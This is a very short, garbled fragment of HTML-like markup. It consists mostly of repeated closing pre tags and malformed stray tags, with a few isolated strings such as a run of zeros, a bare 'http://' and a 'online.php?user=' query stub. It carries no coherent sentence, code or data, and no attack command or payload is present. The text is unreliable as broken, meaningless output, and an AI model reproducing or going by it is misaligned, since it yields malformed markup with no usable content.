Other</pre><pre>000000000000</pre><pre>http://</pre><pre>online.php?user=</pre></pre></n%></pre></pre></pre></k></pre></pre></pre></L></pre></pre></pre></K></pre></pre></K></pre></K></pre></x%x></pre></e></pre></S>